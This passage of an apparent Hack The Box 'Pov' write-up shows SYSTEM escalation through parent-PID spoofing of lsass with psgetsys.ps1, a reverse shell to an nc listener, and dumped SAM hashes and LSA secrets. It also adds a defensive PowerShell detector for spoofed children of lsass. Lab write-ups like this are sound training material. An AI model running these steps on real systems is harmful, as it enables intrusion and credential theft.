>>>> SeDebugPrivilege Debug programs Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeDebugPrivilege is now Enabled in this token, so we can move on to SYSTEM.
┌──(root㉿kali)-[~/Desktop/htb/pov]
└─# wget https://raw.githubusercontent.com/decoder-it/psgetsystem/master/psgetsys.ps1
--2025-12-11 11:31:34-- https://raw.githubusercontent.com/decoder-it/psgetsystem/master/psgetsys.ps1
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 198.18.0.91
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|198.18.0.91|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5926 (5.8K) [text/plain]
Saving to: ‘psgetsys.ps1’
psgetsys.ps1 100%[==================================>] 5.79K --.-KB/s in 0.02s
2025-12-11 11:31:35 (354 KB/s) - ‘psgetsys.ps1’ saved [5926/5926]
Upload psgetsys.ps1 with evil-winrm's built-in upload command:
*Evil-WinRM* PS C:\Users\alaading\Documents> upload psgetsys.ps1
Info: Uploading /root/Desktop/htb/pov/psgetsys.ps1 to C:\Users\alaading\Documents\psgetsys.ps1
Data: 7900 bytes of 7900 bytes copied
Info: Upload successful!
The script needs the PID of a running SYSTEM process to use as the spoofed parent: with SeDebugPrivilege it can open that process and pass the handle via PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, so the new process is created under that parent and inherits its SYSTEM token. Here I use lsass:
*Evil-WinRM* PS C:\Users\alaading\Documents> get-process lsass
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
919 23 5516 14964 1.27 636 0 lsass
# import the script
*Evil-WinRM* PS C:\Users\alaading\Documents> Import-Module .\psgetsys.ps1
# test command
ImpersonateFromParentPid -ppid 636 -command "C:\Windows\System32\cmd.exe" -cmdargs "/c whoami"
Then spawn a reverse shell with a base64-encoded PowerShell payload (payload omitted):
*Evil-WinRM* PS C:\Users\alaading\Documents> ImpersonateFromParentPid -ppid 636 -command "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -cmdargs "-e [...]"
┌──(root㉿kali)-[~/Desktop/htb/pov]
└─# rlwrap nc -lvnp 6666
listening on [any] 6666 ...
connect to [10.10.14.87] from (UNKNOWN) [10.129.230.183] 49707
PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32>
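The parent-PID spoofing used above leaves a visible artifact: cmd.exe and powershell.exe now appear as children of lsass.exe, which never spawns anything. The defender-side check below is an added example and not part of the writeup; it flags unexpected children of lsass.exe and winlogon.exe in a Win32_Process-shaped snapshot. The sample snapshot is constructed to mirror this box (lsass at PID 636 with two spoofed children); the live call at the end runs the same logic on the real process list.

```powershell
# Added example: detect children of processes that should not have any (or only a known set).
function Find-SuspiciousChildren {
    param(
        # Records with Name, ProcessId, ParentProcessId, CommandLine (the Win32_Process shape).
        [Parameter(Mandatory)][object[]]$Processes,
        # Parents worth watching and the children they legitimately create (lowercase).
        [hashtable]$Allowed = @{
            'lsass.exe'    = @()                                               # spawns nothing
            'winlogon.exe' = @('userinit.exe', 'logonui.exe', 'dwm.exe', 'fontdrvhost.exe')
        }
    )
    $byPid = @{}
    foreach ($p in $Processes) { $byPid[[int]$p.ProcessId] = $p }

    foreach ($p in $Processes) {
        $parent = $byPid[[int]$p.ParentProcessId]
        if (-not $parent) { continue }                     # parent exited or outside the snapshot
        $pname = ([string]$parent.Name).ToLower()
        if (-not $Allowed.ContainsKey($pname)) { continue }
        if ($Allowed[$pname] -contains ([string]$p.Name).ToLower()) { continue }
        [pscustomobject]@{
            Parent      = $parent.Name
            ParentPid   = $parent.ProcessId
            Child       = $p.Name
            ChildPid    = $p.ProcessId
            CommandLine = $p.CommandLine
        }
    }
}

# Constructed snapshot: the two processes psgetsys launched under lsass (PID 636) plus normal noise.
$sample = @(
    [pscustomobject]@{ Name='wininit.exe';    ProcessId=504;  ParentProcessId=400; CommandLine='wininit.exe' }
    [pscustomobject]@{ Name='lsass.exe';      ProcessId=636;  ParentProcessId=504; CommandLine='C:\Windows\system32\lsass.exe' }
    [pscustomobject]@{ Name='services.exe';   ProcessId=628;  ParentProcessId=504; CommandLine='C:\Windows\system32\services.exe' }
    [pscustomobject]@{ Name='svchost.exe';    ProcessId=900;  ParentProcessId=628; CommandLine='svchost.exe -k netsvcs' }
    [pscustomobject]@{ Name='winlogon.exe';   ProcessId=560;  ParentProcessId=480; CommandLine='winlogon.exe' }
    [pscustomobject]@{ Name='dwm.exe';        ProcessId=980;  ParentProcessId=560; CommandLine='dwm.exe' }
    [pscustomobject]@{ Name='cmd.exe';        ProcessId=4120; ParentProcessId=636; CommandLine='C:\Windows\System32\cmd.exe /c whoami' }
    [pscustomobject]@{ Name='powershell.exe'; ProcessId=4188; ParentProcessId=636; CommandLine='powershell.exe -e ...' }
)
Find-SuspiciousChildren -Processes $sample | Format-Table -AutoSize   # flags cmd.exe and powershell.exe under lsass

# Live check on a host:
Find-SuspiciousChildren -Processes (Get-CimInstance Win32_Process) | Format-Table -AutoSize
```

A snapshot only catches processes still running. For a durable signal, compare the ParentProcessId in process-creation telemetry with the process that actually issued the create call (kernel ETW records the real creator in the event header); a mismatch is the direct fingerprint of PROC_THREAD_ATTRIBUTE_PARENT_PROCESS.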
3. Hashes
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f7c883121d0f63ee5b4312ba7572689b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:1fa5b00b7c6cc4ac2807c4d5b3dd3dab:::
sfitz:1000:aad3b435b51404eeaad3b435b51404ee:012e5ed95e8745ea5180f81648b6ec94:::
alaading:1001:aad3b435b51404eeaad3b435b51404ee:31c0583909b8349cbe92961f9dfa5dbf:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DPAPI_SYSTEM
dpapi_machinekey:0x2e477986f0cb591476d872caeb48052e3df5cf11
dpapi_userkey:0xf7d2eaaa2cb35427e1ff00730465bd2707c896b4
[*] NL$KM
0000 A2 1F 88 7C B1 5A C3 9A 91 08 6E 90 09 5A C7 B6 ...|.Z....n..Z..
0010 5B 2F 4A C7 0E 7C 56 E7 A5 51 2D CD C2 E0 2A 91 [/J..|V..Q-...*.
0020 DB AD 8F EB 4C EE DB 0E 12 36 30 0B D2 97 26 77 ....L....60...&w
0030 E1 26 EA 5E 2A A5 03 13 3C BE 1D D3 00 62 69 0E .&.^*...<....bi.
NL$KM:a21f887cb15ac39a91086e90095ac7b65b2f4ac70e7c56e7a5512dcdc2e02a91dbad8feb4ceedb0e1236300bd2972677e126ea5e2aa503133cbe1dd30062690e
[*] Cleaning up...